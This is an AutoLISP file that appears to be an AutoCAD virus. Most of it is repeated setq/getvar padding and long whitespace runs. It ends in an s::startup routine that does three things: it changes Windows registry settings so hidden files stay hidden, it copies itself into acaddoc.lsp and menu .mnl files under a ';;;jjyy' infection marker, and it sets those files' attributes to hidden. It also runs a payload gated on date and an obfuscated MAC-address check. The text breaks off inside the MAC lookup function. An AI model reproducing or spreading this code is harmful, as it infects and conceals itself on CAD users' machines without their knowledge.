(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )

;;;jjyy
